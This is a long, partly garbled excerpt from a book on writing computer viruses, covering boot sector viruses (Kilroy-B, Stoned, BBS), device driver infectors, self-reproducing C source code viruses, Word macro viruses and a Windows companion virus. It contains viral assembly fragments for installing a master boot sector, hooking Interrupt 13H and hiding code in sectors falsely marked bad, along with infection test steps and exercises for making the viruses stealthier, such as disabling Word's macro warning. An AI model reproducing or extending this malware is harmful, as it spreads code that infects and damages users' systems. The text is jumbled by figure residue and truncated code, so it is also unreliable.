ret ;and halt the system
END START
Testing Kilroy-B
Since Kilroy-B doesn’t touch hard disks, it is fairly easy to test
without infecting your hard disk. To test it, simply run KIL-
ROY.COM with a bootable system disk in the A: drive to load the
virus into the boot sector on that floppy disk. Next, place a diskette
in both your A: and your B: drives, and then restart the computer.
By the time you get to the A: prompt, the B: drive will already have
been infected. You can check it with a sector editor such as that
provided by PC Tools or Norton Utilities, and you will see the
“ Kilroy” name in the boot sector instead of the usual MS-DOS
name. The disk in B: can subsequently be put into A: and booted
to carry the infection on another generation.
If you don’t have something like Norton Utilities, two small
programs have been included on the diskette that comes with this
book. They are BOOTREAD and BOOTWRT. BOOTREAD will
read the boot sector on a diskette in the A: drive and save it to a file
named BOOT.SEC. Alternatively, BOOTWRT will write the boot
sector file BOOT.SEC to the boot sector of the diskette in drive A:.
These tools will make your exploration of boot sector viruses a bit
easier, but be careful not to write miscellaneous boot sectors on
108 The Giant Black Book of Computer Viruses
Exercises
1. Write a COM program that will display your name and address. (Use
only BIOS calls!) Next, modify the BASIC boot sector to load and
execute your program. Put both on a disk and make this “ operating
system” which you just designed boot successfully.
2. Modify the BASIC boot sector to display the address of the Interrupt
Service Routine for Interrupt 13H. This value is the original BIOS
vector. Next, modify the BASIC boot sector to check the Interrupt 13H
vector with the value your other modification displayed, and display a
warning if it changed. Though this is useless against Kilroy, this boot
sector is a valuable anti-virus tool which you may want to install in your
computer. We’ll discuss why in the next chapter.
3. Modify the Kilroy-B to search the entire root directory for IO.SYS and
IBMBIO.COM, rather than just looking at the first file.
One of the most successful computer viruses the world has ever
seen is the Stoned virus, and its many variants, which include the
infamous Michelangelo. Stoned is a very simple one sector boot
sector virus, but it has travelled all around the world and captured
headlines everywhere. At one time Stoned was so prevalent that the
National Computer Security Association reported that roughly one
out of every four virus infections involved some form of Stoned.1
At the same time, Stoned is really very simple. That just goes
to show that a virus need not be terribly complex to be successful.
In this chapter, we’ll examine a fairly straight-forward variety
of the Stoned. It will introduce an entirely new technique for
infecting floppy disks, and also illustrate the basics of infecting the
hard disk.
START3
Jump to
0000:7C00H
Hard Disk
or
Hard disk
Floppy?
Floppy
Yes Display
Timer set to display
message
message?
No
Relocate master boot
Read hard disk sector
master boot sector
Move partition table
Infected?
Yes to viral boot sector
No
Jump to 0:7C00H Write viral master
boot sector to disk
0, Sector 1. The BIOS will then load the virus at startup and give it
control. The virus does its work, then loads the original boot sector,
which in turn loads the operating system. (See Figure 10.1)
This technique has the advantage of being somewhat operating
system independent. For example, the changes needed to accom-
modate a large IO.SYS would not affect a virus like this at all,
because it relies on the original boot sector to take care of these
details. On the other hand, an operating system that was radically
different from what the virus was designed for could still obviously
cause problems. The virus could easily end up putting the old boot
sector right in the middle of a system file, or something like that,
rather than putting it in an unoccupied area.
The Stoned virus always hides the original boot sector in Track
0, Head 1, Sector 3 on floppy disks, and Cylinder 0, Head 0, Sector
7 on hard disks. For floppy disks, this location corresponds to a
sector in the root directory. (Figure 10.2)
Note that hiding a boot sector in the root directory could
overwrite directory entries with boot sector code. Or the original
sector could subsequently be overwritten by directory information.
Stoned was obviously written for 5-1/4" 360 kilobyte diskettes,
because Track 0, Head 1, Sector 3 corresponds to the last root
directory sector on the disk. This leaves six sectors before it—or
room for about 96 entries before problems start showing up. It’s
probably a safe bet that you won’t find many 360K diskettes with
more than 96 files on them.
When one turns away from 360K floppies though, Stoned
becomes more of a nuisance. On 1.2 megabyte disks, Track 0, Head
1, Sector 3 corresponds to the third sector in the root directory. This
leaves room for only 32 files. On 1.44 megabyte disks, there is only
room for 16 files, and on 720K disks, only 64 files are able to coexist
with the virus.
Memory Residence
Kilroy was not very infective because it could only infect a
single disk at boot time if there was a disk in drive B. A boot sector
virus would obviously be much more successful if it could infect
diskettes in either drive any time they were accessed, even if it were
hours after the machine was started. To accomplish such a feat, the
virus must install itself resident in memory.
112 The Giant Black Book of Computer Viruses
T
FA
4
RO
OT
7
FAT 1
Side 0
3
ROO
8
T
2
1
(BS)
AT
9
F 1 RO
OT
STONED
ST2
CLU CLU
ST
T2 14 15 3
US
CL
13
CL
UST
16
ORIG BS
(ROOT)
Side 1
12
CLUS
17
T4
11
OT
1
O
R 10 CL 8
US
T4
ROOT
The Most Successful Virus 113
then it calculates the segment where the start of the memory hole
is,
MOV CL,6 ;Convert mem size to segment
SHL AX,CL ;value
MOV ES,AX ;and put it in es
Operating
System
(IO.SYS)
Master
Boot Sector 0700
0600
.model small
.code
;The loader is executed when this program is run from the DOS prompt. It
;reads the partition table and installs the Master Boot Sector to the C: drive.
ORG 100H
LOADER:
mov ax,201H ;read existing master boot sector
mov bx,OFFSET BUF
mov cx,1
mov dx,80H
int 13H
ORG 7C00H
BOOT:
cli
xor ax,ax ;set up segments and stack
mov ds,ax
mov es,ax
mov ss,ax
mov sp,OFFSET BOOT
sti
ACT_FOUND:
mov dl,al ;operating system found
lodsb ;set up registers to read its boot sector
mov dh,al
ORG 7DBEH
DB 55H,0AAH
END LOADER
To detect itself, Stoned merely checks the first four bytes of the
boot sector. Because of the way it’s coded, Stoned starts with a far
jump (0EAH), while ordinary operating system boot sectors start
with a short jump (E9), and Master Boot Sectors start with some-
thing entirely different. So a far jump is a dead give-away that the
virus is there.
If not present, Stoned proceeds to copy the partition table to
itself2, and then write itself to disk at Cylinder 0, Head 0, Sector 1,
2 Note that Stoned needs a copy of the partition table even if its code never uses it.
That’s because the BIOS and DOS both look for the table in the Master Boot Sector.
If the Master Boot Sector (viral or not) didn’t have the table and you booted from the
118 The Giant Black Book of Computer Viruses
Offset Size Description
A: drive, the C: drive would disappear. Furthermore, you couldn’t even boot from the
C: drive.
The Most Successful Virus 119
.
.
GOTO_BIOS:
.
.
JMP DWORD PTR CS:[OLD_INT13];Jump to old int 13
will allow an infection attempt only if the disk motor is off. Thus,
if you load a program like CALC.EXE, the virus will activate at
most once—when the first sector is read. This activity is almost
unnoticeable.
120 The Giant Black Book of Computer Viruses
MESSAGE_DONE:
the start of the boot sector is at offset 0, rather than the usual 7C00H.
The far jump at the beginning of Stoned adjusts cs to 07C0H so that
the virus can execute properly with a starting offset 0. You’ll notice
that some of the data references after START3 have 7C00H added
to them. This is done because the data segment isn’t the same as
the code segment yet (ds=0 still). Once the virus jumps to high
memory, everything is in sync and data may be addressed normally.
Exercises
1. Modify Stoned so that it does not infect the hard disk at all. You may
find this modification useful for testing purposes in the rest of these
exercises, since you won’t have to clean up your hard disk every time
you run the virus.
3. Take out the motor status check in the Interrupt 13H handler, and then,
with the virus active, load a program from floppy. Take note of the
added disk activity while loading.
4. Rewrite Stoned so that it does not need a far jump at the start of its code.
5. Install the modified BASIC boot sector that examines the Interrupt 13H
vector which was discussed in Exercise 2 of the last chapter. Make sure
it works, and then infect this diskette with Stoned. Does the BASIC boot
sector now alert you that the Interrupt 13H vector has been modified?
Why? Can you see how this can be a useful anti-virus program?
122 The Giant Black Book of Computer Viruses
Chapter 11
Advanced Boot
Sector Techniques
Source Code for this Chapter: \BBS\BBS.ASM
virus must first load the rest of itself into memory. Figure 11.1
explains this loading process.
Another important difference is that the BBS handles floppy
infections in a manner completely compatible with DOS. As you’ll
remember, the Stoned could run into problems if a root directory
had too many entries in it—a not uncommon occurrence for some
disk formats. The BBS, because it is larger, can use a technique
which will not potentially damage a disk.
(A) Viral boot sector (B) Viral boot sector (C) Viral boot sector
moves itself to high loads the rest of virus installs Int 13H and
memory. and old boot sector. moves old boot sector
to execute.
A000:0000 A000:0000 A000:0000
Viral BS Viral BS Viral BS
9820:7C00
Old BS
Main Main
Body of Body of
Virus Virus
9820:7600 9820:7600
Viral BS Old BS
0000:7C00 0000:7C00
0 is normally free, the virus can store up to 512 bytes times the
number of sectors in that cylinder.
At boot time, the BBS virus gets the size of conventional
memory from the BIOS data area at 0:413H, subtracts
(VIR_SIZE+3)/2=2 from it, then copies itself into high memory.
BBS adjusts the segment it uses for cs so that the viral Master Boot
Sector always executes at offset 7C00H whether it be in segment 0
or the high segment which BBS reserves for itself. (See Figure 11.1)
Once in high memory, the BBS Master Boot Sector loads the
rest of the virus and the original Master Boot Sector just below it,
from offset 7600H to 7BFFH. Then it hooks Interrupt 13H, moves
the original Master Boot Sector to 0:7C00H, and executes it.
Simple enough.
Typically, a disk will have two identical copies of the FAT table
(it’s important, so a backup made sense to the designers of DOS).
They are stored back-to-back right after the operating system boot
sector, and before the root directory. DOS uses two kinds of FATs,
12-bit and 16-bit, depending on the size of the disk. Windows 95
added a third kind of FAT, the 32-bit FAT. All of the standard
floppy formats use 12-bit FATs, while smaller hard disks use 16-bit
FATs. Larger hard disks use 32-bit FATs. The main criterion used
for choosing which to use is the size of the disk. A 12-bit FAT
allows about 4K entries, whereas a 16-bit FAT allows nearly 64K
entries. The 32-bit FAT allows 4 billion entries. The more FAT
entries, the more clusters, and the more clusters, the smaller each
cluster will be. That’s important, because a cluster represents the
minimum storage space on a disk. If you have a 24 kilobyte cluster
size, then even a one byte file takes up 24K of space. At the small
end of the scale, however, a small FAT is advantageous because
the FAT table takes up less disk space.
Let’s consider the 12-bit FAT a little more carefully here. For
an example, let’s look at a 360K floppy. Clusters are two sectors,
and there are 355 of them. The first FAT begins in Track 0, Head
0, Sector 2, and the second in Track 0, Head 0, Sector 4. Each FAT
is also two sectors long.
The first byte in the FAT identifies the disk type. A 360K disk
is identified with an 0FDH in this byte. The first valid entry in the
FAT is actually the third entry in a 12-bit FAT. Figure 11.2 dissects
a typical File Allocation Table.
Normally, when a diskette is formatted, the FORMAT program
verifies each track as it is formatted. If it has any trouble verifying
a cylinder, it marks the relevant cluster bad in the FAT using an
FF7 entry. DOS then avoids those clusters in every disk access. If
it did not, the disk drive would hang up on those sectors every time
something tried to access them, until the program accessing them
timed out. This is an annoying sequence of events you may some-
times experience with a disk that has some bad sectors on it that
went bad after it was formatted.
When infecting a floppy disk, the BBS virus first searches the
FAT to find some sectors that are currently not in use on the disk.
Then it marks these sectors, where it hides its code, as bad even
though they really aren’t. That way, DOS will no longer access
them. Thus, the BBS virus won’t interfere with DOS, though it will
Advanced Boot Sector Techniques 127
Bad Clusters
Empty Clusters
call INIT_FAT_MANAGER
mov cx,VIR_SIZE+1
call FIND_FREE
jc EXIT
mov dx,cx
mov cx,VIR_SIZE+1
call MARK_CLUSTERS
call UPDATE_FAT_SECTOR
With FATs properly marked, the virus need only write itself to
disk. But where? To find out, the virus calls one more FAT-
Marked Bad
CT
SE
OT
ORIG BO
RECTORY
R O O T DI
FA
VIR A L
BOOT SECTOR
Advanced Boot Sector Techniques 129
Self-Detection
To avoid doubly-infecting a diskette (which, incidentally,
would not be fatal) or a hard disk (which would be fatal), BBS reads
the boot sector on the disk it wants to infect and compares the first
30 bytes of code with itself. These 30 bytes start after the data area
in the boot sector at the label BOOT. If they are the same, then the
virus is safe in assuming that it has already infected the disk, and it
need not re-infect it.
Compatibility
In theory, the BBS virus will be compatible with any FAT-
based floppy disk and any hard disk.
In designing any virus that hides at the top of conventional
memory and hooks Interrupt 13H, one must pay some attention to
what will happen when advanced operating systems like Windows
95 or Windows NT load into memory. These operating systems
typically do not use the BIOS to access the disk. Rather, they have
installable device drivers that do all of the low-level I/O and
interface with the hardware. Typically, a virus like BBS will simply
get bypassed when such an operating system is loaded. It will be
active until the device driver is loaded, and then it sits there in limbo,
130 The Giant Black Book of Computer Viruses
N
Head 0?
Y
N
Track 0?
Pass control to
Y
Y ROM BIOS
Hard Disk?
N
N
Sector 1?
Y
Read Boot
Sector
Is Disk Y
Infected?
N
Infect
Disk
unable to infect any more floppy disks, because Interrupt 13H never
gets called.
Windows 95, however, has what is called a compatibility mode.
This mode continues to use Interrupt 13H to access a disk. If
Windows can’t get at the original ROM BIOS Interrupt 13H vector
(such as when a boot sector virus has hooked that vector) it will go
into compatibility mode. This politely allows the virus to continue
in operation.
Another thing that Windows 95 does is notice that the Master
Boot Record on the disk it is starting up from has changed. It then
displays the message:
Warning: Your computer may have a virus. The Master Boot Record on your
computer has been modified. Would you like to see more information about this
problem?
Advanced Boot Sector Techniques 131
The Loader
The BBS virus as presented on the diskette with this book
compiles to a COM file which can be executed directly from DOS.
When executed from DOS, the loader simply calls the IN-
FECT_FLOPPY routine, which proceeds to infect the diskette in
drive A: and then exit.
Exercises
1. Rather than looking for any free space on disk, redesign BBS to save
the body of its code in a fixed location on the disk, provided it is not
occupied.
2. Rather than hiding where normal data goes, a virus can put its body in
a non-standard area on the disk that’s not even supposed to be there.
For example, on many 360K floppy drives, the drive is physically
capable of accessing Track 40, even though it’s not a legal value.
Modify the BBS to attempt to format Track 40 using Interrupt 13H,
Function 5. If successful, store the body of the virus there and don’t
touch the FAT. Since DOS never touches Track 40, the virus will be
perfectly safe there. Another option is that many Double Sided, Double
Density diskettes can be formatted with 10 sectors per track instead of
nine. You can read the 9 existing sectors in, format with 10 sectors,
write the 9 back out, and use the tenth for the virus. To do this, you’ll
need to fool with the inter-sector spacing a bit.
COM, EXE and boot sector viruses are not the only possibilities
for DOS executables. One could also infect SYS files.
Although infecting SYS files is perhaps not that important a
vector for propagating viruses, simply because people don’t share
SYS files the way they do COMs, EXEs and disks, I hope this
exercise will be helpful in opening your mind up to the possibilities
open to viruses. And certainly there are more than a few viruses out
there that do infect device drivers already.
Let’s tackle this problem from a little bit different angle:
suppose you are a virus writer for the U.S. Army, and you’re given
the task of creating a SYS-infecting virus, because the enemy’s
anti-virus has a weakness in this area. How would you go about
tackling this job?
1 Refer to the Resources section at the end of this book for information on how to get
plugged into this network.
2 Note that newer versions of DOS also support a device driver format that looks more
like an EXE file, with an EXE-style header on it. We will not discuss this type of
Infecting Device Drivers 135
driver here.
136 The Giant Black Book of Computer Viruses
;DEVICE.ASM is a simple device driver to illustrate the structure of
;a device driver. All it does is announce its presence when loaded.
.model tiny
.code
ORG 0
HEADER:
dd -1 ;Link to next device driver
dw 0C840H ;Device attribute word
dw OFFSET STRAT ;Pointer to strategy routine
dw OFFSET INTR ;Pointer to interrupt routine
db ’DEVICE’ ;Device name
;This is the strategy routine. Typically it just takes the value passed to it
;in es:bx and stores it at RHPTR for use by the INTR procedure. This value is
;the pointer to the request header, which the device uses to determine what is
;being asked of it.
STRAT:
mov WORD PTR cs:[RHPTR],bx
mov WORD PTR cs:[RHPTR+2],es
retf
;This is the interrupt routine. It’s called by DOS to tell the device driver
;to do something. Typical calls include reading or writing to a device,
;opening it, closing it, etc.
INTR:
push bx
push si
push di
push ds
push es
push cs
pop ds
les di,[RHPTR] ;es:di points to request header
mov al,es:[di+2] ;get command number
INTRX: pop es
pop ds
pop di
pop si
pop bx
retf
END STRAT
10 8 Device name.
Infecting Device Drivers 139
Y Infected?
N
Set STRAT pointer
in header to VIRUS
Append virus
image to SYS file
VIRUS
INTR INTR
Routine Routine
DEVIRUS
STRAT STRAT
Routine Routine
catable, just as they were with COM files. Without that, all data
references will be wrong after the first infection.
Exercises
1. Later versions of DOS allow a device driver to be loaded into high
memory above the 640K barrier by calling the driver with a new
command, “ DEVICEHIGH=” . As written, DEVIRUS won’t recognize
this command as specifying a device. Modify it so that it will recognize
both “ DEVICE=” and “ DEVICEHIGH=” .
2. Later versions of DOS have made room for very large device drivers,
which take up more than 64 kilobytes. These drivers have a format more
like an EXE file, with a header, etc. Learn something about the structure
of these files and modify DEVIRUS so that it can infect them too.
The Concept
A source code virus attempts to infect the source code for a
program—the C, PAS or ASM files—rather than the executable.
The resulting scenario looks something like this (Figure 13.1):
Software Developer A contracts a source code virus in the C files
for his newest product. The files are compiled and released for sale.
The product is successful, and thousands of people buy it. Most of
the people who buy Developer A’s software will never even have
the opportunity to watch the virus replicate because they don’t
develop software and they don’t have any C files on their system.
However, Developer B buys a copy of Developer A’s software and
puts it on the system where his source code is. When Developer B
executes Developer A’s software, the virus activates, finds a nice
C file to hide itself in, and jumps over there. Even though Developer
B is fairly virus-conscious, he doesn’t notice that he’s been infected
because he only does virus checking on his EXE’s, and his scanner
can’t detect the virus in Developer A’s code. A few weeks later,
Developer B compiles a final version of his code and releases it,
complete with the virus. And so the virus spreads. . . .
While such a virus may only rarely find its way into code that
gets widely distributed, there are hundreds of thousands of C
compilers out there, and potentially hundreds of millions of files to
infect. The virus would be inactive as far as replication goes, unless
it was on a system with source files. However, a logic bomb in the
compiled version could be activated any time an executable with
the virus is run. Thus, all of Developer A and Developer B’s clients
1 Ralf Burger, Computer Viruses and Data Protection, (Abacus, Grand Rapids,
MI:1991) p. 252.
Source Code Viruses 145
Program A
Program A Executable
Source Compile
Virus
Compiled
Virus as
Source Code
Distribution
could suffer loss from the virus, regardless of whether or not they
developed software of their own.
Source code viruses also offer the potential to migrate across
environments. For example, if a programmer was doing develop-
ment work on some Unix software, but he put his C code onto a
DOS disk and took it home from work to edit it in the evening, he
might contract the virus from a DOS-based program. When he
146 The Giant Black Book of Computer Viruses
copied the C code back to his workstation in the morning, the virus
would go right along with it. And if the viral C code was sufficiently
portable (not too difficult) it would then properly compile and
execute in the Unix environment.
A source code virus will generally be more complex than an
executable-infector with a similar level of sophistication. There are
two reasons for this: (1) The virus must be able to survive a compile,
and (2) The syntax of a high level language (and I include assembler
here) is generally much more flexible than machine code. Let’s
examine these difficulties in more detail:
Since the virus attacks source code, it must be able to put a copy
of itself into a high-level language file in a form which that compiler
will understand. A C-infector must put C-compileable code into a
C file. It cannot put machine code into the file because that won’t
make sense to the compiler. However, the infection must be put into
a file by machine code executing in memory. That machine code is
the compiled virus. Going from source code to machine code is
easy—the compiler does it for you. Going backwards—which the
virus must do—is the trick the virus must accomplish. (Figure 13.2)
The first and most portable way to “ reverse the compile,” if
you will, is to write the viral infection routine twice— once as a
compileable routine and once as initialized data. When compiled,
the viral routine coded as data ends up being a copy of the source
code inside of the executable. The executing virus routine then just
copies the virus-as-data into the file it wants to infect. Alternatively,
if one is willing to sacrifice portability, and use a compiler that
accepts inline assembly language, one can write most of the virus
as DB statements, and do away with having a second copy of the
source code worked in as data. The DB statements will just contain
machine code in ASCII format, and it is easy to write code to
convert from binary to ASCII. Thus the virus-as-instructions can
make a compileable ASCII copy of itself directly from its binary
instructions. Either approach makes it possible for the virus to
survive a compile and close the loop in Figure 13.2.
Obviously, a source code virus must place a call to itself
somewhere in the program source code so that it will actually get
called and executed. Generally, this is a more complicated task
when attacking source code than when attacking executables. Ex-
ecutables have a fairly rigid structure which a virus can exploit. For
example, it is an easy matter to modify the initial cs:ip value in an
Source Code Viruses 147
C File
EXE File
Compiler
Virus as
Machine Code
Virus as Virus
Source Code
EXE file so that it starts up executing some code added to the end
of the file, rather than the intended program. Not so for a source
file. Any virus infecting a source file must be capable of under-
standing at least some rudimentary syntax of the language it is
written in. For example, if a virus wanted to put a call to itself in
the main() routine of a C program, it had better know the difference
between
/*
void main(int argc, char *argv[]) {
This is just a comment explaining how to
do_this(); The program does this
and_this(); And this, twice.
and_this();
. . . }
*/
148 The Giant Black Book of Computer Viruses
and
or it could put its call inside of a comment that never gets compiled
or executed!
Source code viruses could conceivably achieve any level of
sophistication in parsing code, but only at the expense of becoming
as large and unwieldy as the compiler itself. Normally, a very
limited parsing ability is best, along with a good dose of politeness
to avoid causing problems in questionable circumstances.
So much for the two main hurdles a source code virus must
overcome.
Generally source code viruses will be large compared to ordi-
nary executable viruses. Ten years ago that would have made them
impossible on microcomputers, but today programs hundreds of
kilobytes in length are considered small. So adding 10 or 20K to
one isn’t necessarily noticeable. Presumably the trend toward big-
ger and bigger programs will continue, making the size factor much
less important.
what I’m calling a source code virus. These guys were all LISP
freaks (and come to think of it LISP would be a nice language to
do this kind of stuff in). They weren’t so much the assembly
language tinkerers of the eighties who really made a name for
viruses.
The whole discussion we had was very hypothetical, though I
got the feeling some of these guys were trying these ideas out.
Looking back, I don’t know if the discussion was just born of
intellectual curiosity or whether somebody was trying to develop
something like this for the military, and couldn’t come out and say
so since it was classified. (The AI Lab was notorious for its secret
government projects.) I’d like to believe it was just idle speculation.
On the other hand, it wouldn’t be the first time the military was
quietly working away on some idea that seemed like science fiction.
The next thread I find is this: Fred Cohen, in his book A Short
Course on Computer Viruses, described a special virus purportedly
put into the first Unix C compiler for the National Security Agency
by Ken Thompson.2 It was essentially designed to put a back door
into the Unix login program, so Thompson (or the NSA) could log
into any system. Essentially, the C compiler would recognize the
login program’s source when it compiled it, and modify it. How-
ever, the C compiler also had to recognize another C compiler’s
source, and set it up to propagate the “ fix” to put the back door in
the login. Although Thompson evidently did not call his fix a virus,
that’s what it was. It tried to infect just one class of programs: C
compilers. And its payload was designed to miscompile only the
login program. This virus wasn’t quite the same as a source code
virus, because it didn’t add anything to the C compiler’s source
files. Rather, it sounds like a hybrid sort of virus, which could only
exist in a compiler. None the less, this story (which is admittedly
third hand) establishes the existence of viral technology in the
seventies. It also suggests again that these early viruses were not
too unlike the source code viruses I’m discussing here.
One might wonder, why would the government be interested
in developing viruses along the lines of source code viruses, rather
in some function in the file. If you don’t notice these little additions,
you may never notice the virus is there.
SCV1 is not very sneaky about where it puts these additions to
a C file. The include statement is inserted on the first line of a file
that is not part of a comment, the call to sc_virus() is always placed
right before the last closing bracket in a file. That makes it the last
thing to execute in the last function in a file. For example, if we take
the standard C example program HELLO.C:
/* An easy program to infect with SCV1 */
#include <stdio.h>
void main()
{
printf(“%s”,"Hello, world.");
}
and let it get infected by SCV1. It will then look like this:
/* An easy program to infect with SCV1 */
#include <virus.h>
#include <stdio.h>
void main()
{
printf(“%s”,"Hello, world.");
sc_virus();}
When executed, the virus must perform two tasks: (1) it must
look for the VIRUS.H file. If VIRUS.H is not present, the virus
must create it in your INCLUDE directory, as specified in your
environment. (2) The virus must find a suitable C file to infect, and
if it finds one, it must infect it. It determines whether a C file is
suitable to infect by searching for the
#include <virus.h>
statement. If it finds it, SCV1 assumes the file has already been
infected and passes it by. To avoid taking up a lot of time executing
on systems that do not even have C files on them, SCV1 will not
look for VIRUS.H or any C files if it does not find an INCLUDE
environment variable. Checking the environment is an extremely
fast process, requiring no disk access, so the average user will have
no idea the virus is there.
VIRUS.H may be broken down into two parts. The first part is
simply the code which gets compiled. The second part is the
character constant virush[], which contains the whole of VI-
RUS.H as a constant. If you think about it, you will see that some
coding trick must be employed to handle the recursive nature of
virush[]. Obviously, virush[] must contain all of VIRUS.H,
including the specification of the constant virush[] itself. The
function write_virush() which is responsible for creating a new
VIRUS.H in the infection process, handles this task by using two
indicies into the character array. When the file is written,
write_virush() uses the first index to get a character from the array
and write it directly to the new VIRUS.H file. As soon as a null in
virush[] is encountered, this direct write process is suspended.
Then, write_virush() begins to use the second index to go through
virush[] a second time. This time it takes each character in
virush[] and converts it to its numerical value, e.g.,
‘a’ ‘65’
and writes that number to VIRUS.H. Once the whole array has been
coded as numbers, write_virush() goes back to the first index
and continues the direct transcription until it reaches the end of the
array again.
Source Code Viruses 153
direct EXE infector. And the power of the language assures us that
much more complex and effective viruses could be concocted.
Test Drive
To create the virus in its executable form, you must first create
VIRUS.H from VIRUS.HS using the CONSTANT, and then com-
pile SCV1.C with Microsoft C 7.0. (Other versions will probably
work.) The following commands will do the job, provided you have
your include environment variable set to \C700\INCLUDE:
constant
copy virus.h \c700\include
cl scv1.c
#include <stdio.h>
#include <v784.h>
/******************************************************************************/
void main()
{
s784(); // just go infect a .c file
}
#ifndef S784
#define S784
#include <stdio.h>
#include <dos.h>
static char a784[]={0};
Exercises
1. Compress the virus SCVIRUS.PAS to see how small you can make it.
2. Write an assembly language source virus which attacks files that end
with “ END XXX” (so it knows these are the main modules of pro-
grams). Change the starting point XXX to point to a DB statement
where the virus is, followed by a jump to the original starting point. You
shouldn’t need a separate data and code version of the virus to design
this one.
Chapter 14
Macro Viruses
Source Code for this Chapter: \MACRO\CONCEPT.DOC
\MACRO\CON97.DOC
Macro viruses are not, in principle, any different from some of
the viruses we’ve already discussed. Take the idea of a source code
virus which we developed in the last chapter and apply it to a
language that is interpreted, rather than compiled, and you have
what is essentially a macro virus.
If you’ve gotten this far in this book, you are a fairly competent
programmer, so perhaps I don’t need to bore you by detailing the
differences between a compiled language and an interpreted lan-
guage, but just in case some of my readers have never played with
interpreted BASIC or something, let’s review.
Generally, with a compiled language, a source file is translated
by a compiler into machine code and written to disk in the form of
an executable file. The executable file is then distributed to the
people who will use the program. With an interpreted language, the
source file is never translated to machine code. Rather, an inter-
preter takes the source and interprets the instructions it contains,
performing the actions they specify. As such, to distribute the
program, one must distribute the source code for the program.
A virus can work with an interpreted programming language
in very much the same way as it does in a compiled programming
language. In fact, such a virus can be a bit simpler because it doesn’t
have to carry around a copy of its own source code with it. Since
the source is being interpreted, the source is already right there,
either in memory or on disk. (Unless the interpreter encrypts it
somehow.)
160 The Giant Black Book of Computer Viruses
Microsoft Word 97
Well, Microsoft realized they had made a big boo-boo in
making it so easy to write viruses for their word processor. So they
put a routine in Word for Windows 97 to check for the presence of
macros in a file and warn the user. The user then has the choice of
whether to disable the macros or not. This helps a lot in preventing
the spread of viruses unaware, as the macros cannot execute unless
the user allows them to.
Still, the sorry truth is that all too many people still let the
macros execute. So Microsoft did one other thing to frustrate the
virus writers: they changed their macro language from Word Basic
to Visual Basic. They provided a translation utility to make the
macros from Word 95 work with Word 97. To translate a call, say
CountMacros(0,0) to Word 97, all you have to do is change it to
WordBasic.CountMacros(0,0). Thus, it’s pretty easy to update
macros, and Word will even do it for you. There is, however, one
exception to this: the call MacroCopy doesn’t work that way.
There’s a completely new way that it has to be done, and Word
won’t translate it for you. Neither will Word let you copy a macro
to a different name.
This little trick effectively makes all Word 95 macro viruses
sterile in Word 97. That was probably a smart move on Microsoft’s
part. However, these big changes mean that a lot of old anti-virus
164 The Giant Black Book of Computer Viruses
3. Save your file and exit Word. The next time you open the
file (if you allow macros to execute), your NORMAL.DOT will be
infected. After that, every file you save will be infected.
Now I suppose you can see just how easy Word viruses are,
and why they’re so popular.
Exercises
1. Add a macro to Concept 97 to turn off Word’s query for whether you
want to run embedded macros when files are loaded. That way, if your
virus gets run once, Word will never bother the user again, while the
virus is busy at work infecting his whole system.
2. Write an overwriting virus that infects every file in the current directory
by copying itself to that file when the infected file is saved.
166 The Giant Black Book of Computer Viruses
Chapter 15
A Windows
Companion Virus
Source Code for this Chapter: \HOSTS\HOST1.ASM
\HOSTS\HOST2.ASM
\WINBUG\WINBUG.ASM
A Simplest Program
The first step in learning to program Windows with assembler
is simply to write a few ordinary programs. Then we’ll take one of
those ordinary programs and turn it into a companion virus.
Programming in 32-bit Windows is not fundamentally different
than DOS or 16-bit Windows, with the exception that one cannot
simply call DOS interrupts to get things done. Calling the 32-bit
Windows Application Program Interface (API) is mandatory. Still,
the simplest program one can write is not any more complex than
the simplest DOS program. That simplest program just returns
A Windows Companion Virus 169
This just called DOS Function 4CH, which terminated the program.
A 32-bit Windows program that does the same thing looks like this:
HOST:
push LARGE -1
call ExitProcess
This just puts a (32 bit) return value on the stack and calls the
Windows API to exit the program. There is nothing very fancy
going on here. The Windows API works by pushing parameters
onto the stack and calling functions, rather than by storing parame-
ters in registers and calling interrupt vectors.
Now, of course, neither in DOS nor in Windows can one simply
put the above three lines in a file and expect them to assemble
properly. Some assembler directives are necessary to tell the as-
sembler and linker what kind of a file to create, what’s code, what’s
data, and so on.
If we throw in all the assembler directives, the DOS program
looks like this:
.model tiny
.code
ORG 100H
HOST:
mov ax,4C00H
int 21H
END HOST
The first line sets up the model type, which here we choose to be a
tiny model for creating a COM file, the second line specifies the
code segment, and the code is specified to originate at offset 100H.
After that is the program, followed by the END statement which
tells the assembler where execution of the code begins. Simple
enough.
170 The Giant Black Book of Computer Viruses
.data
dummy dd ?
.code
extrn ExitProcess:PROC
HOST:
push LARGE -1
call ExitProcess
END HOST
Here we must specify the .386 directive because the program is for
use only on 386 and above processors. We specify the flat model,
which is 32-bit Windows. Next, notice that we specify a dummy
data variable which never gets used. For some reason Windows-
95—or the linker—doesn’t like it if we attempt to write a program
that has no data segment. Thus, a dummy variable is put in just to
keep everybody happy. Then comes the code segment, which
contains the program, and also an external declaration to ExitProc-
ess. Since ExitProcess is part of the Windows API, it must be
defined as external to the program. All in all, the program does not
look that different from its DOS counterpart.
To assemble the program correctly, assuming it is named
HOST1.ASM, the commands are
tasm32 /ml HOST1,,;
tlink32 /Tpe /aa /c HOST1,HOST1,, import32.lib
.386
locals
jumps
.model flat,STDCALL
INCLUDE HOST2.INC
end HOST
172 The Giant Black Book of Computer Viruses
A Companion Virus
Typically, ordinary Windows programs are designed to present
the user with an interface, and sit there waiting for him to tell the
program to do something. Our simple HOST2 program works this
way. It displays a window, and waits for user input. The only real
user input it accepts is to maximize or minimize the window, or
quit.
A virus doesn’t fit this paradigm of operation very well. The
typical virus doesn’t want to announce its presence by displaying
a window, and then ask the user if he wants to infect files, etc. The
thought of it is absurd. Rather, a virus goes out and infects files
without the user’s consent or knowledge. Simply put, it just does
its job. So what use does a virus have for a GUI interface? None,
unless it wants to play a prank on the user and let its presence be
known.
As such, we have to lay aside the standard Windows program-
ming techniques in order to program viruses. We already did that
with the simplest possible Windows program, HOST1. That pro-
gram just did something without user input: it terminated. It never
displayed a window. It never gave you any real indication that it
had executed. That’s a good starting place for a virus! Let’s take it
and add some functionality to it. We’ll call our creation WinBug.
Although WinBug could be written in a high level language,
like C++ or Delphi, we’ll work through it in assembler. That will
be a good way to cut our teeth on Windows-based assembler. Doing
it in a high level language is left to the exercises.
A Windows Companion Virus 173
and then works back through the type definitions in the include files
(e.g. WINNT.H) to find out what the variables actually are. Using
assembler notation, the function call looks like this:
DWORD FindFirstFile(DWORD,DWORD);
INFECT_FILES:
lea eax,[ebp+FIND_DATA] ;address of search data structure
push eax
push OFFSET EXE_FILE ;’*.EXE’
call FindFirstFileA ;do find first
cmp eax,-1
jz EXIT_IFILES ;nothing found, exit
